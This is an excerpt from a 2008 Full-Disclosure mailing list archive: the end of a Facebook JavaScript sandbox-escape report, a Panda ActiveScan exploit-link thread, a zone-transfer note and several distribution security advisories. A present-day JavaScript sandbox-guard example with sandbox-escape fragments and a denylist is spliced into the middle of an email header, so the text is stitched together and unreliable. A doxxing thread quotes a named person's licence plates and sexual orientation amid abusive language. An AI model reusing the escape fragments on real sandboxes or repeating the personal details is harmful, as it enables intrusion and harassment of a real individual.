> Fixed: yes
> Example:
>
> 7) Escaping JS sandbox
> Impact: execution of unrestricted JS on canvas pages or profiles
> (mouseclick required on profile pages)
> Browsers: FF
> Reported: June 21, 2008
> Fixed: no
>
> 8) Escaping JS sandbox
> Impact: execution of unrestricted JS on canvas pages or profiles
> (mouseclick required on profile pages)
> Browsers: FF
> Reported: June 21, 2008
> Fixed: no
>
> --
> Jouko Pynnönen
> http://iki.fi/jouko
> Finland
>

--
Jouko Pynnönen
http://iki.fi/jouko
Finland

From karol at wiesek.pl Sat Jul 5 10:59:02 2008
From: karol at wiesek.pl (Karol Więsek)
Date: Sat, 05 Jul 2008 11:59:02 +0200
Subject: [Full-disclosure] Panda ActiveScan 2.0 remote code execution
Message-ID: <486F45E6.8070203@wiesek.pl>

http://karol.wiesek.pl/files/panda.tgz

K.

From secure at pandasecurity.com Fri Jul 4 12:02:13 2008
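The sandbox escapes in Jouko Pynnonen's Facebook message above (items 1, 4, 7 and 8) all reach a denied property through bracket syntax on a literal. The JavaScript below is an added example, not code from the post or from Facebook: `naiveStaticCheck`, `guardedGet`, the two denylists and the `FRAGMENTS` samples are assumptions made for illustration, contrasting a source-text name filter with a runtime check on the computed key.

```javascript
// Added example (not Facebook's code): checking computed property access at
// run time instead of filtering property names in the source text.

// Assumed denylist of property names, for illustration; a production
// sandbox would normally use an allowlist instead.
const BLOCKED_KEYS = new Set([
  'constructor', '__parent__', '__proto__', 'prototype', 'caller', 'callee',
]);

// Values guest code must never receive, whatever property name reached them:
// the global object, eval and every function constructor.
const BLOCKED_VALUES = new Set([
  globalThis,
  eval,
  Function,
  Object.getPrototypeOf(async function () {}).constructor,
  Object.getPrototypeOf(function* () {}).constructor,
]);

// Source-text filter of the kind the message describes: it rejects a blocked
// name written with dot syntax and never looks at bracket syntax.
function naiveStaticCheck(source) {
  for (const key of BLOCKED_KEYS) {
    if (new RegExp('\\.\\s*' + key + '\\b').test(source)) return false;
  }
  return true;
}

// Runtime guard. A sandbox rewriter would turn every guest `base[expr]` into
// `guardedGet(base, expr)`, so the check sees the key that is actually used,
// whether the base is an identifier or a function/string/regexp literal.
function guardedGet(base, key) {
  if (base === null || base === undefined) {
    throw new TypeError('sandbox: property access on ' + base);
  }
  if (typeof key === 'symbol') {
    throw new Error('sandbox: symbol keys are not allowed');
  }
  // Coerce once: the string that is checked is the string that is looked up.
  const name = String(key);
  if (BLOCKED_KEYS.has(name)) {
    throw new Error('sandbox: blocked property "' + name + '"');
  }
  const value = base[name];
  if (BLOCKED_VALUES.has(value)) {
    throw new Error('sandbox: "' + name + '" resolves to a blocked value');
  }
  return value;
}

// Member-access fragments taken from the examples in the message (items 1,
// 7 and 8), plus the dotted form the message says the sandbox already denied.
const FRAGMENTS = [
  'Function.constructor',
  'function f(){}["constructor"]',
  '"a"["__parent__"]',
  '/a/["__parent__"]',
];

function isBlocked(base, key) {
  try {
    guardedGet(base, key);
    return false;
  } catch (e) {
    return true;
  }
}

function runDemo() {
  return {
    // true means the source-text filter let the fragment through.
    staticVerdicts: FRAGMENTS.map(naiveStaticCheck),
    // true means the runtime guard refused the access.
    runtimeBlocked: [
      isBlocked(function f() {}, 'constructor'),
      isBlocked('a', '__parent__'),
      isBlocked(/a/, '__parent__'),
      isBlocked(function f() {}, 'con' + 'structor'),
      isBlocked({ w: globalThis }, 'w'),
    ],
    // Ordinary property reads still work.
    benign: guardedGet('abc', 'length'),
  };
}

console.log(runDemo());
```

The source-text filter passes every bracket-syntax fragment, while the guard refuses the same accesses because it inspects the key and the resulting value at the moment of the lookup.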
From: secure at pandasecurity.com (Panda Security Response)
Date: Fri, 4 Jul 2008 13:02:13 +0200
Subject: [Full-disclosure] Panda ActiveScan 2.0 remote code execution
Message-ID: <84ECAF53A2F0F045BD9B7FD0FC56A0BD0B4C0554@ESMADEXH02.MADRID.PANDASOFTWARE.LOCAL>

Please allow at least one week for us to respond before public disclosure. We only received this information a few days ago.

Regards,

----------------------------------------------
Pedro Bustamante
Senior Research Advisor
Panda Security

email: pedro.bustamante at pandasecurity.com <0xC684A6F9>
vulns: secure at pandasecurity.com <0x70F3FEA0>
phone: (+34) 91-8063700
blog: http://research.pandasoftware.com
----------------------------------------------

> -----Original Message-----
> From: full-disclosure-bounces at lists.grok.org.uk
> [mailto:full-disclosure-bounces at lists.grok.org.uk] On behalf
> of Karol Wiesek
> Sent: Saturday, July 05, 2008 11:59 AM
> To: full-disclosure at lists.grok.org.uk
> Subject: [Full-disclosure] Panda ActiveScan 2.0 remote code execution
>
> http://karol.wiesek.pl/files/panda.tgz
>
> K.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From charles.lists at gmail.com Fri Jul 4 12:41:54 2008
From: charles.lists at gmail.com (Charles Majola)
Date: Fri, 04 Jul 2008 13:41:54 +0200
Subject: [Full-disclosure] Panda ActiveScan 2.0 remote code execution
In-Reply-To: <84ECAF53A2F0F045BD9B7FD0FC56A0BD0B4C0554@ESMADEXH02.MADRID.PANDASOFTWARE.LOCAL>
References: <84ECAF53A2F0F045BD9B7FD0FC56A0BD0B4C0554@ESMADEXH02.MADRID.PANDASOFTWARE.LOCAL>
Message-ID: <486E0C82.70200@gmail.com>

Embarrassing init?

Panda Security Response wrote:
> Please allow at least one week for us to respond before public disclosure. We only received this information a few days ago.
>
> Regards,
>
> ----------------------------------------------
> Pedro Bustamante
> Senior Research Advisor
> Panda Security
>
> email: pedro.bustamante at pandasecurity.com <0xC684A6F9>
> vulns: secure at pandasecurity.com <0x70F3FEA0>
> phone: (+34) 91-8063700
> blog: http://research.pandasoftware.com
> ----------------------------------------------
>
>> -----Original Message-----
>> From: full-disclosure-bounces at lists.grok.org.uk
>> [mailto:full-disclosure-bounces at lists.grok.org.uk] On behalf
>> of Karol Wiesek
>> Sent: Saturday, July 05, 2008 11:59 AM
>> To: full-disclosure at lists.grok.org.uk
>> Subject: [Full-disclosure] Panda ActiveScan 2.0 remote code execution
>>
>> http://karol.wiesek.pl/files/panda.tgz
>>
>> K.
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From randy at procyonlabs.com Fri Jul 4 13:59:40 2008
From: randy at procyonlabs.com (Randal T. Rioux)
Date: Fri, 4 Jul 2008 08:59:40 -0400 (EDT)
Subject: [Full-disclosure] Panda ActiveScan 2.0 remote code execution
In-Reply-To: <84ECAF53A2F0F045BD9B7FD0FC56A0BD0B4C0554@ESMADEXH02.MADRID.PANDASOFTWARE.LOCAL>
References: <84ECAF53A2F0F045BD9B7FD0FC56A0BD0B4C0554@ESMADEXH02.MADRID.PANDASOFTWARE.LOCAL>
Message-ID: <18251.192.168.3.1.1215176380.squirrel@192.168.3.2>

On Fri, July 4, 2008 7:02 am, Panda Security Response wrote:
> Please allow at least one week for us to respond before public
> disclosure. We only received this information a few days ago.
>
> Regards,
>
> ---------------------------------------------- Pedro Bustamante Senior
> Research Advisor Panda Security

It takes a week to hit the "respond" button? At least be polite and read your mail, perhaps with a quick "stand by, we're looking into it" response so folks think you care.

We are an impatient lot in this community.

From NetExpress at tiscali.it Fri Jul 4 13:51:55 2008
From: NetExpress at tiscali.it (NetExpress)
Date: Fri, 04 Jul 2008 14:51:55 +0200
Subject: [Full-disclosure] zonedit.com e dns zone transfer
Message-ID: <486E1CEB.7010307@tiscali.it>

For .it domains, nic.it does not act as a default secondary DNS, so anyone who has a .it domain has to buy a secondary DNS service if they don't have one.

zoneedit.com sells this kind of service.

By default, if you leave the permit zone forward box blank, anyone on the internet could make a zone transfer.

So you can have an ACL set on your primary DNS server, but this is bypassed if you use a secondary DNS server, if it is on zonedit.com with the default configuration parameters.

NetExpress

From rholgstad at gmail.com Fri Jul 4 15:25:29 2008
From: rholgstad at gmail.com (Robert Holgstad)
Date: Fri, 4 Jul 2008 09:25:29 -0500
Subject: [Full-disclosure] Panda ActiveScan 2.0 remote code execution
In-Reply-To: <84ECAF53A2F0F045BD9B7FD0FC56A0BD0B4C0554@ESMADEXH02.MADRID.PANDASOFTWARE.LOCAL>
References: <84ECAF53A2F0F045BD9B7FD0FC56A0BD0B4C0554@ESMADEXH02.MADRID.PANDASOFTWARE.LOCAL>
Message-ID: <1278b0690807040725w26cf41edmcab3a6db8c87145e@mail.gmail.com>

no one cares about your slow response time or that it takes you a week to fix a bug that apps have had for 10 years. maybe if your product did not suck so much you would get more respect.. now get off the list dbag.

On Fri, Jul 4, 2008 at 6:02 AM, Panda Security Response <secure at pandasecurity.com> wrote:
> Please allow at least one week for us to respond before public disclosure.
> We only received this information a few days ago.
>
> Regards,
>
> ----------------------------------------------
> Pedro Bustamante
> Senior Research Advisor
> Panda Security
>
> email: pedro.bustamante at pandasecurity.com <0xC684A6F9>
> vulns: secure at pandasecurity.com <0x70F3FEA0>
> phone: (+34) 91-8063700
> blog: http://research.pandasoftware.com
> ----------------------------------------------
>
> > -----Original Message-----
> > From: full-disclosure-bounces at lists.grok.org.uk
> > [mailto:full-disclosure-bounces at lists.grok.org.uk] On behalf
> > of Karol Wiesek
> > Sent: Saturday, July 05, 2008 11:59 AM
> > To: full-disclosure at lists.grok.org.uk
> > Subject: [Full-disclosure] Panda ActiveScan 2.0 remote code execution
> >
> > http://karol.wiesek.pl/files/panda.tgz
> >
> > K.
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From security at mandriva.com Fri Jul 4 21:58:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Fri, 04 Jul 2008 14:58:00 -0600
Subject: [Full-disclosure] [ MDVSA-2008:131 ] - Updated phpMyAdmin packages fix multiple vulnerabilities
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:131
http://www.mandriva.com/security/
_______________________________________________________________________

Package : phpMyAdmin
Date    : July 4, 2008
Affected: Corporate 4.0
_______________________________________________________________________

Problem Description:

A few vulnerabilities and security-related issues have been fixed in phpMyAdmin since the 2.11.2.2 release. This update provides version 2.11.7 which is the latest stable release of phpMyAdmin and fixes CVE-2008-1149, CVE-2008-1567, CVE-2008-1924, and CVE-2008-2960.

No configuration changes should be required since the previous update (version 2.11.2.2). If upgrading from older versions, it may be necessary to reconfigure phpMyAdmin. The configuration file is located in /etc/phpMyAdmin/. In most cases, it should be sufficient to simply replace config.default.php with config.default.php.rpmnew and make whatever modifications are necessary.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1149
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1567
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1924
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2960
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIbmQlmqjQ0CJFipgRAiOLAKCWT4FG2bbn7i0KrRJhZ0Uj15FZaQCfav8j
zk1La9gfrLbWwxqjHoAO7uk=
=imOk
-----END PGP SIGNATURE-----

From secure at pandasecurity.com Fri Jul 4 22:08:13 2008
From: secure at pandasecurity.com (Panda Security Response)
Date: Fri, 4 Jul 2008 23:08:13 +0200
Subject: [Full-disclosure] Panda ActiveScan 2.0 remote code execution
Message-ID: <84ECAF53A2F0F045BD9B7FD0FC56A0BD0B4C079A@ESMADEXH02.MADRID.PANDASOFTWARE.LOCAL>

The fixed version is now in production.

Regards,

----------------------------------------------
Pedro Bustamante
Senior Research Advisor
Panda Security

email: pedro.bustamante at pandasecurity.com <0xC684A6F9>
vulns: secure at pandasecurity.com <0x70F3FEA0>
phone: (+34) 91-8063700
blog: http://research.pandasoftware.com
----------------------------------------------

> -----Original Message-----
> From: full-disclosure-bounces at lists.grok.org.uk
> [mailto:full-disclosure-bounces at lists.grok.org.uk] On behalf
> of Karol Wiesek
> Sent: Saturday, July 05, 2008 11:59
> To: full-disclosure at lists.grok.org.uk
> Subject: [Full-disclosure] Panda ActiveScan 2.0 remote code execution
>
> http://karol.wiesek.pl/files/panda.tgz
>
> K.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From elazar at hushmail.com Fri Jul 4 22:39:35 2008
From: elazar at hushmail.com (Elazar Broad)
Date: Fri, 04 Jul 2008 17:39:35 -0400
Subject: [Full-disclosure] Panda ActiveScan 2.0 remote code execution
Message-ID: <20080704213936.436C4D0331@mailserver10.hushmail.com>

"We are an impatient lot in this community." - well said...

On Fri, 04 Jul 2008 08:59:40 -0400 "Randal T. Rioux" wrote:
>On Fri, July 4, 2008 7:02 am, Panda Security Response wrote:
>> Please allow at least one week for us to respond before public
>> disclosure. We only received this information a few days ago.
>>
>> Regards,
>>
>> ---------------------------------------------- Pedro Bustamante Senior
>> Research Advisor Panda Security
>
>It takes a week to hit the "respond" button? At least be polite and read
>your mail, perhaps with a quick "stand by, we're looking into it" response
>so folks think you care.
>
>We are an impatient lot in this community.
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/

From security at mandriva.com Fri Jul 4 23:26:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Fri, 04 Jul 2008 16:26:00 -0600
Subject: [Full-disclosure] [ MDVSA-2008:132 ] - Updated gnome-screensaver packages fix authentication vulnerability
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:132
http://www.mandriva.com/security/
_______________________________________________________________________

Package : gnome-screensaver
Date    : July 4, 2008
Affected: 2008.0
_______________________________________________________________________

Problem Description:

A vulnerability was found in gnome-screensaver prior to 2.22.1 when a remote authentication server was enabled. During a network outage, gnome-screensaver would crash upon an unlock attempt, allowing physically local users to gain access to locked sessions (CVE-2008-0887).

The updated packages have been patched to correct this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0887
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security.
You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIbnlBmqjQ0CJFipgRAmrpAJ4pjogxYidKc6dIzVh+fg/y0WWEWACfRWg2
a4s4HJsPaYWPS6aEw+cChFg=
=JWTr
-----END PGP SIGNATURE-----

From security at mandriva.com Fri Jul 4 23:46:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Fri, 04 Jul 2008 16:46:00 -0600
Subject: [Full-disclosure] [ MDVSA-2008:133 ] - Updated sympa packages fix DoS vulnerability
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:133
http://www.mandriva.com/security/
_______________________________________________________________________

Package : sympa
Date    : July 4, 2008
Affected: Corporate 4.0
_______________________________________________________________________

Problem Description:

A denial of service condition was discovered in Sympa versions prior to 5.4 that allowed remote attackers to crash the Sympa daemon via a malformed email message (CVE-2008-1648).

The updated packages have been patched to correct this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1648
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security.
You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIbn2pmqjQ0CJFipgRAjU4AKDruMtTUyjhioGwVY7fC9JpfFMEmwCgnISg
K71LnRteysY9RFwbHyNy05U=
=zzr/
-----END PGP SIGNATURE-----

From security at mandriva.com Sat Jul 5 01:27:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Fri, 04 Jul 2008 18:27:00 -0600
Subject: [Full-disclosure] [ MDVSA-2008:134 ] - Updated squid packages fix DoS vulnerability
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:134
http://www.mandriva.com/security/
_______________________________________________________________________

Package : squid
Date    : July 4, 2008
Affected: 2007.1, 2008.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0
_______________________________________________________________________

Problem Description:

An incorrect fix for CVE-2007-6239 resulted in Squid not performing proper bounds checking when processing cache update replies. Because of this, a remote authenticated user might have been able to trigger an assertion error and cause a denial of service (CVE-2008-1612).

The updated packages have been patched to correct this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1612
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIbpQAmqjQ0CJFipgRAsR+AJ4g5qnBkSyeSivUD+xaP0Yl8ZqpvACfcSc0
XDy1eYKV1xhQ1PVS+6JR73g=
=xqb/
-----END PGP SIGNATURE-----

From security at mandriva.com Sat Jul 5 04:17:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Fri, 04 Jul 2008 21:17:00 -0600
Subject: [Full-disclosure] [ MDVSA-2008:135 ] - Updated gnome-screensaver packages fix authentication vulnerability
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:135
http://www.mandriva.com/security/
_______________________________________________________________________

Package : gnome-screensaver
Date    : July 4, 2008
Affected: 2008.0
_______________________________________________________________________

Problem Description:

A vulnerability was found in gnome-screensaver 2.20.0 that could possibly allow a local user to read the clipboard contents and X selection data for a locked session by using CTRL-V (CVE-2007-6389).

The updated packages have been patched to correct this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6389
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security.
You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIbr1OmqjQ0CJFipgRAkjZAKClXVE/9WNz8HXdHC9of1f42KkQZACeNlB/
w+N6ZRSimCJm8DsZQ3Zq81E=
=mSMX
-----END PGP SIGNATURE-----

From fw at deneb.enyo.de Sat Jul 5 13:37:12 2008
From: fw at deneb.enyo.de (Florian Weimer)
Date: Sat, 05 Jul 2008 14:37:12 +0200
Subject: [Full-disclosure] [SECURITY] [DSA 1602-1] New pcre3 packages fix arbitrary code execution
Message-ID: <877ic04idj.fsf@mid.deneb.enyo.de>

------------------------------------------------------------------------
Debian Security Advisory DSA-1602-1                security at debian.org
http://www.debian.org/security/                           Florian Weimer
July 05, 2008                         http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : pcre3
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)      : CVE-2008-2371

Tavis Ormandy discovered that PCRE, the Perl-Compatible Regular
Expression library, may encounter a heap overflow condition when
compiling certain regular expressions involving in-pattern options and
branches, potentially leading to arbitrary code execution.

For the stable distribution (etch), this problem has been fixed in
version 6.7+7.4-4.

For the unstable distribution (sid), this problem has been fixed soon.

We recommend that you upgrade your pcre3 packages.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
-------------------------------

These files will probably be moved into the stable distribution on
its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From thijs at debian.org Fri Jul 4 08:16:56 2008
From: thijs at debian.org (Thijs Kinkhorst)
Date: Fri, 4 Jul 2008 09:16:56 +0200 (CEST)
Subject: [Full-disclosure] [SECURITY] [DSA 1601-1] New wordpress packages fix several vulnerabilities
Message-ID: <20080704071656.2DC06326F4A@morgana.loeki.tv>

------------------------------------------------------------------------
Debian Security Advisory DSA-1601-1                security at debian.org
http://www.debian.org/security/                          Thijs Kinkhorst
July 04, 2008                         http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : wordpress
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-1599 CVE-2008-0664
Debian Bug     : 437085 464170

Several remote vulnerabilities have been discovered in Wordpress,
the weblog manager. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2007-1599

    WordPress allows remote attackers to redirect authenticated users
    to other websites and potentially obtain sensitive information.

CVE-2008-0664

    The XML-RPC implementation, when registration is enabled, allows
    remote attackers to edit posts of other blog users.

For the stable distribution (etch), these problems have been fixed in
version 2.0.10-1etch3.

For the unstable distribution (sid), these problems have been fixed in
version 2.3.3-1.

We recommend that you upgrade your wordpress package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
-------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10.orig.tar.gz
    Size/MD5 checksum:   520314 e9d5373b3c6413791f864d56b473dd54
  http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3.dsc
    Size/MD5 checksum:      891 d925a63731976b72ad35e4c1805623bf
  http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3.diff.gz
    Size/MD5 checksum:    46073 486916bd4fc6463181eaba84fdc2db31

Architecture independent packages:

  http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3_all.deb
    Size/MD5 checksum:   527158 280ba949f5c38079d2209a468697fb00

These files will probably be moved into the stable distribution on
its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From socketpuppetsftw at gmail.com Sun Jul 6 00:19:30 2008
From: socketpuppetsftw at gmail.com (Sock Puppet) Date: Sat, 5 Jul 2008 19:19:30 -0400 Subject: [Full-disclosure] Mrfetch Paul Carnes YouTube Message-ID: [ The contents of this message have been deleted from the Full-Disclosure archive in response to a request of a legal nature. ] From neilm at debian.org Sun Jul 6 12:46:49 2008 From: neilm at debian.org (Neil McGovern) Date: Sun, 6 Jul 2008 12:46:49 +0100 Subject: [Full-disclosure] Mrfetch Paul Carnes YouTube In-Reply-To: References: Message-ID: <20080706114649.GA26620@mx0.halon.org.uk> On Sat, Jul 05, 2008 at 07:19:30PM -0400, Sock Puppet wrote: > Mrfetch (Paul Carnes) is a homosexual What the hell does this have to do with his technical views? > Relatives: Fuck off and die. Love, Neil -- A. Because it breaks the logical sequence of discussion Q. Why is top posting bad? gpg key - http://www.halon.org.uk/pubkey.txt ; the.earth.li B345BDD3 From londone at hushmail.com Sun Jul 6 15:28:44 2008 
From: londone at hushmail.com (londone at hushmail.com) Date: Sun, 06 Jul 2008 08:28:44 -0600 Subject: [Full-disclosure] Mrfetch Paul Carnes YouTube Message-ID: <20080706142845.D5696D032E@mailserver10.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Sat Jul 05 2008 - 18:19:30 CDT, Sock Puppet wrote: > REGISTRATION INFORMATION ****** > > Original Registration Date: 3/17/1997 Registration Date: 3/17/1997 ...... > Plate Number: 63BY204 Plate State: ALABAMA Plate Type: PRIVATE Vehicle's > Previous Plate Number: 63APS45 Vehicle's Previous Plate State: > ALABAMA ...... > > Status: Single Orientation: Gay Age: 23 Zodiac Sign: Aries (Mar 21 - > Apr 19) if he is 23 today then he was 12 when he titled his car in 1997. alabama may be full of bible thumping inbred hicks but few of them owned cars when they were 12. alabama minimum age for drivers is 15. http://golocalnet.com/drivingage/ > Model Year: 1989 Manufacturer: FORD Model: ESCORT 4D Vehicle Series: LX perhaps you are just upset that he drives a ford and not a buick. fw -----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkhw1p0ACgkQ7o1mUuE8XVq58QQAhU6TO/w8UDFoyZty1BfFy/Xr74zv qTc12t3HB4BQ5aGH5J7nnqYjzpxIMbhgUPkXeekRWgPTeY8PJIYdSkXJEFeCjd9LyTTM 7lfDFZkai0cZA1si7KLs3fh45AgeggqQs9O6cy9CpxhwP/MYasYGQoQReKoNADgPXqMt RMqb1ns= =dIfm -----END PGP SIGNATURE----- -- Enter for Your Chance to WIN* The TotalBeauty.com Summer Spa Sweepstakes! http://tagline.hushmail.com/fc/JKFkuIjyZ563qePQA7KI8lD10mBfbG9LGZ2Wp1Xc6CkrscoghtWiNq/ From rbu at gentoo.org Mon Jul 7 21:34:53 2008 
From: rbu at gentoo.org (Robert Buchholz)
Date: Mon, 7 Jul 2008 22:34:53 +0200
Subject: [Full-disclosure] [ GLSA 200807-03 ] PCRE: Buffer overflow
Message-ID: <200807072235.03287.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200807-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: PCRE: Buffer overflow
      Date: July 07, 2008
      Bugs: #228091, #230039
        ID: 200807-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer overflow vulnerability has been discovered in PCRE, allowing
for the execution of arbitrary code and a Denial of Service.

Background
==========

PCRE is a Perl-compatible regular expression library. GLib includes a
copy of PCRE.

Affected packages
=================

    -------------------------------------------------------------------
     Package            /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  dev-libs/libpcre      < 7.7-r1                          >= 7.7-r1
  2  dev-libs/glib         < 2.16.3-r1                    >= 2.16.3-r1
                                                              < 2.14.0
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

Tavis Ormandy of the Google Security team reported a heap-based buffer
overflow when compiling regular expression patterns containing
"Internal Option Settings" such as "(?i)".

Impact
======

A remote attacker could exploit this vulnerability by sending a
